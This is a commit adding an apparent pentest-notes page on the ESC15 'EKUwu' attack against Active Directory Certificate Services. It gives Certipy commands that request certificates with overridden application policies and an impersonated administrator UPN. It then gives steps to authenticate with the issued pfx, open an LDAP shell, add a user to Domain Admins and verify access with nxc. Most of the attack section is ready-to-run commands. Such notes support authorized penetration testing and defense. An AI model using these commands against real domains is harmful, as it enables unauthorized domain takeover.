Create 13. ESC15 Certificate Templates.md

Added notes for ESC15

Author: tjnull

Obsidian Pentest Template 1.0/Obsidian Pentest Template 1.0/3. Enumeration Notes/Services/3. Active Directory (AD)/Enumerating ADCS/13. ESC15 Certificate Templates.md

@@ -0,0 +1,25 @@
+# General Overview: 
+
+The ESC15 "EKUwu" attack abuses legacy Active Directory Certificate Services (AD CS) version 1 templates, which allow attackers to override Extended Key Usage (EKU) settings by using application policies. This misconfiguration enables an attacker with enrollment rights to generate certificates with escalated privileges for actions like client authentication, certificate request agent, or code signing.
+
+# Abusing ESC15 Certificate Templates
+
+## Certipy:
+
+Note: It is recommend to create python virtual environment (venv) to run this version of certipy.
+
+Method 1:
+- `certipy req -ca 'ca_name' -target "$ADCS_HOST" -u "[email protected]" -p "$PASSWORD" -template 'vulnerable template' -upn 'xadmin' --application-policies 'Client Authentication'`
+Obtaining the Application Policy OID:
+- `certipy req -ca 'ca_name' -target "$ADCS_HOST" -u "[email protected]" -p "$PASSWORD" -template 'vulnerable template' -upn 'xadmin' --application-policies '1.3.6.1.5.5.7.3.2'`
+Method 2 (Using Schannel): 
+- `certipy req -u "[email protected]" -p "$PASSWORD" -dc-ip 172.21.0.1 -ca 'ca_name' -template 'vulnerable template' -upn 'xadmin' --target 172.21.0.2 --application-policies 'Client Authentication'`
+- certipy auth -pfx domainadmin.pfx -ldap-shell -dc-ip 172.21.0.1
+- add_user_to_group esc15user "Domain Admins"
+- nxc smb 172.21.0.1 -u esc15user -p "Password"
+
+# References
+- https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc
+- https://github.com/dru1d-foofus/Certipy/tree/esc15-ekuwu
+- Video Tutorial: https://www.youtube.com/watch?v=PKvazCvlb9A
+- Potential Pull Request to the main Certipy project: https://github.com/ly4k/Certipy/pull/228